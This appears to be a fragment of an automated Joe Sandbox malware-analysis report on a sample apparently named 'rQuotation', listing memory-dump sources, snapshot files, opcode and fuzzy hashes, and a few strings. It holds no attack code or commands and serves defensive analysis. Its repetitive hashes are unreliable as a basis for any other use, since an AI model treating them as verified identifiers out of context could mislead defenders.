• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: BinaryHash
• API String ID: 0-2202222882
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
Strings
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: BinaryName
• API String ID: 0-215506332
Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0174895E
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
• API String ID: 0-702105204
Memory Dump Source
• Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 464e54a7dfc4f5e0653dd2c84447f464a43cc8cfd442eb802ab1ab94d1f08335
                                                                                                                                                                                                                                                • Instruction ID: 7c48eb865e4cc928353df4b744cabbe7da112b0048ba419400a4ed4e6d9f1520
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 464e54a7dfc4f5e0653dd2c84447f464a43cc8cfd442eb802ab1ab94d1f08335
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44821372F102188BCB58CFADDC916DDB7F2EF88314B19812DE41AEB345DA34AC568B45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: effe2052e5090bea4e814dca19260a7b7d3baf0efc589f2eb6c91389d1d9ae2e
                                                                                                                                                                                                                                                • Instruction ID: 0100d13fdad6f73be175971f6c58ff5eba82f009c052009b589e95bd0c652bfa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: effe2052e5090bea4e814dca19260a7b7d3baf0efc589f2eb6c91389d1d9ae2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48629E7290874AEFCF27CF08D4904AEFBA2BE55314B49C698C89A67745D371BA44CF90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 10affff3718f9cbb0e1b3794e900101f4e5dc525f06e876634f027363377b83f
                                                                                                                                                                                                                                                • Instruction ID: 2ae98420c2bfd449cf4583b7b1b29776e5dc60867c5b7dc17c3b1c8d0a12e5de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10affff3718f9cbb0e1b3794e900101f4e5dc525f06e876634f027363377b83f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E742D3716083429FD7A5CF68C890A6BFBE9BF88340F08492DFE8297252D775D845CB52
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e1488d3b517d0d57d35629c2914bd4f568c402e2fe48378379a55f1216e23cf2
                                                                                                                                                                                                                                                • Instruction ID: 7cadbca17948204c66b1c82f10f2a1365438df4ba7e8ee28504b02185129682c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1488d3b517d0d57d35629c2914bd4f568c402e2fe48378379a55f1216e23cf2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F442B271A006168FDB19CF5DC890ABEFBB2FF88314B24855DD952AB349D734E942CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1c2cf1a7803a6c4a251d6080cc773d35ff5055c35033fb2ed6c061f2ef7c82fb
                                                                                                                                                                                                                                                • Instruction ID: b70d366e00c8dd1739633bb60050b426a383de7420708318b35c8cca8ef8772b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c2cf1a7803a6c4a251d6080cc773d35ff5055c35033fb2ed6c061f2ef7c82fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3329C72E02219DBDB24DF98DC98BAEBBF1FF54714F180129E905AB391E7359901CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3b09db30762cec70cab17d3d8aec4ab7c5e89ca4378aafad37a137cfdd7e7107
                                                                                                                                                                                                                                                • Instruction ID: 3d300dab1c0911269c148ec7ef37dfba5260c74360a681005f2cf718653f2c48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b09db30762cec70cab17d3d8aec4ab7c5e89ca4378aafad37a137cfdd7e7107
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB425B71E102198FEB65CF69C881BADFBF6BF48300F188199E949AB242D7749981CF51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: af7e0c42bc2e1472dec19d50e2a53dcade6006bce47a5eb42927f2114ae22dd9
                                                                                                                                                                                                                                                • Instruction ID: d4e25ed09aad84a290ef4b6865f4a7f0e79c18d4aec0db7b691287f0a0f64e81
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af7e0c42bc2e1472dec19d50e2a53dcade6006bce47a5eb42927f2114ae22dd9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A32F070A007658FDB25CF69C854BBEFBF2BF84704F24411EE9869B285DB75A842CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ea7f1f9179ba244e6af30c164ba754ff6956814ee3f157f1efdf879aaaa7313a
                                                                                                                                                                                                                                                • Instruction ID: 681c9de02a68f69303db9911c09add638f30a83b9f24fcd2010ead8b563184aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea7f1f9179ba244e6af30c164ba754ff6956814ee3f157f1efdf879aaaa7313a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2522D2702046618FEB25CF2DC494772FBF9AF45300F18849AED96AF286D735E852DB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8a27c6a32bdcfe320e8924a78f6d02d2b6d94f9f18705758245c5f091cc8d70a
                                                                                                                                                                                                                                                • Instruction ID: 5cf0606bb1f62c22dc57188b7dd63872d0d589824e3001f5ca6710f1e73afd10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a27c6a32bdcfe320e8924a78f6d02d2b6d94f9f18705758245c5f091cc8d70a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4722DF35B402168FDB19DF58C490ABAF7F2BF88314B68816DD956DB345EB30E942CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7ebd3585e351c56615de4988b0448a053ed76adf7a984d86d6670331c8780128
                                                                                                                                                                                                                                                • Instruction ID: 1b504fd2ff1bb75e63839c01abb96770348d77c39f8eb08a5dfe7f277a4f2b41
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ebd3585e351c56615de4988b0448a053ed76adf7a984d86d6670331c8780128
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7D1F371E0060A8BDF45CF5AC841BFEF7F5AF88304F1881AAD955A7241DB75EA01CB61
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 85a853c7a92a76adc22081c11bdf43e7b8a006129d9e849f30aa2e48b17fc5da
                                                                                                                                                                                                                                                • Instruction ID: f8cb2f954fdac7e9c50f7cb7b42668fabcc8c00294028b5bada5f7d71c945062
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85a853c7a92a76adc22081c11bdf43e7b8a006129d9e849f30aa2e48b17fc5da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E1AF71508342CFC715CF28C890A7ABBE1FF89714F058A6DE99987351DB31E906CB96
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3ac5eaee985d8cb5fccc89565d217d19da28c675689a0418aa0193119149df4c
                                                                                                                                                                                                                                                • Instruction ID: cda46b728d0071db07786177052cc04f0161bfb113559daea01e7fbdc1eda651
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ac5eaee985d8cb5fccc89565d217d19da28c675689a0418aa0193119149df4c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CD1DE71A002069BDB14DF68CCC0AFEB7BDAF64708F05462DE916DB285E734E991CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5178bf7664b2f27fc20b0ca92e2bb11bb0b03cff56a593db7c14799d59570c87
                                                                                                                                                                                                                                                • Instruction ID: a7c89d01a1723a32d18891f7af30a7ad92bd57c4deb869524a12e43c715d7627
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5178bf7664b2f27fc20b0ca92e2bb11bb0b03cff56a593db7c14799d59570c87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AD18F31E062198BEF28CE9CC9497BEBFF1FB44310F15822AD952AB385D7748942DB45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                • Instruction ID: 34bf5350d7d111a8581591e9d5677ddc8c7897b9997a392eb9ba90174a6f072e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FB13A22E115248BEB2D8A5CCCA937E67A3EFD5310F1DC369D9174F7D9DA3899028342
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7b877ec91559e2a1fe941e73ebaa409432496b7c9cb5044f927a22ab5ab633fa
                                                                                                                                                                                                                                                • Instruction ID: acfdd34333a98c669459a9796532fd723438f949d739f27d42f888eb5d3f9f83
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b877ec91559e2a1fe941e73ebaa409432496b7c9cb5044f927a22ab5ab633fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83B18DB1910225AFFF26D724DC59FBBF6ACEB04754F04429D7A19E61C0DB709E848B60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction ID: 15a527e58abf7005c418a0bc4eaa824ef598c67b14628477cb0be1aac642f11d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBB17075A00609AFDB24DFD9C944FABFBBABF84304F10446EAA1297794DB34E905CB11
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction ID: 32295d5b3680c1b32fc2e7f4821159e71ec4242d106ccfe5c8c9c2d3367072ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3B10671A00656AFDB21DB68CD54BBEFBF6AF88300F190159E652DB381D730EA42CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5da5ee4c4518d077e56244f49e1a1661a5a482665bea1e60e2ceed17eeb4e558
                                                                                                                                                                                                                                                • Instruction ID: b9639aaa853ecbcc17456929958c8399a04a33597cf17a6d9eb36ff84bfc9594
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5da5ee4c4518d077e56244f49e1a1661a5a482665bea1e60e2ceed17eeb4e558
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0191F532A101158BCB18CF79D8906BEBBF1FF88314F19826AD816DB39AD734E905CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 54b4433e9f20f38082a7a53008441b2960fbf68e5a74d2b16e0bdabc59ef18a7
                                                                                                                                                                                                                                                • Instruction ID: bb31e113d8f32a2098f8607d3ec016f7282e88eca7a43f04a10402b2c7c32ced
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54b4433e9f20f38082a7a53008441b2960fbf68e5a74d2b16e0bdabc59ef18a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2981D572E405198BCB14DF6DC8805AEF7F1FF88320B58436AD921E7680E774E951CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: be480dd1290b535b26bb1bc50292f8404deb56b6eaf0d44452ad7d80060fc586
                                                                                                                                                                                                                                                • Instruction ID: d050972e92d0d0a16e56a9dfb801c6a64e212d7a205f5992e085c24d27d2dcf3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be480dd1290b535b26bb1bc50292f8404deb56b6eaf0d44452ad7d80060fc586
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE817271E001599FDB25CE6DCC849AEBBB3FFC5210F298299E8549B349D730E942CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5532c40b84b19234e111d0a451447073e515aa5a2b9ebb80d9bde0568fdf8776
                                                                                                                                                                                                                                                • Instruction ID: d262d5faf650e4bc213a2cea0f22c8c3771035a2e81506c7c8f5b2c862b01047
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5532c40b84b19234e111d0a451447073e515aa5a2b9ebb80d9bde0568fdf8776
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6817171A0061A9BDB24CF6DC940ABEFBF9FB48700F14852EE545E7644E374E940CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 22935d54d224194fedaeee6c1e451cdb19c4f460f8e8146126ded1e6f6448172
                                                                                                                                                                                                                                                • Instruction ID: 6c16f8c8de181fd73f529e89efce1cc9d9428c21bb0e782f01374e582a1dd812
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22935d54d224194fedaeee6c1e451cdb19c4f460f8e8146126ded1e6f6448172
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39817176E002159BDF18CF58C990AADFBF1EF89310F2981A9D916EB385DB349D41CB90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                • Instruction ID: d0e57207d9656ebfcdde04a40e7ea19e9cdc44a86d7e4a775480a0ab2479c816
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E819131A0020A9FDF19DF99C884AAEFBF2FF84310F18856AD9169B349D774E941CB50
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d3cb8efbe8930030f356c63c20562d7a99b28c30c3dbb59d7f0d2466b3145a05
                                                                                                                                                                                                                                                • Instruction ID: 6d80e23dcce605373957de5a3e65634e9577ce4b4317e2ebee7cb00f3f7ca048
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3cb8efbe8930030f356c63c20562d7a99b28c30c3dbb59d7f0d2466b3145a05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72817D71A00609AFDB25CFA9C884AEAFBFAFB88314F11442DE655A7251D731AC45CB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bf966cdfcc50cd62c97327af665c9afaed0af90d475d70d630f0d052065b66fb
                                                                                                                                                                                                                                                • Instruction ID: 7907e49f6227ed909e5bd287e32ef9cbc02ac3f7a6993264d1de55c1f13b449e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf966cdfcc50cd62c97327af665c9afaed0af90d475d70d630f0d052065b66fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB71E8302052618EEB35CE2DCD88736B7E1EB45715F14865DED968B2C9DB35E807CB60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: eaf7a09b8b72a4954b82bf4ec6dc308a4494e544c9b8f65a419a8654a40680a3
                                                                                                                                                                                                                                                • Instruction ID: c01601265126fc9e18340d7a324f7832082bc69170ff4d7bbc08adbe9d669195
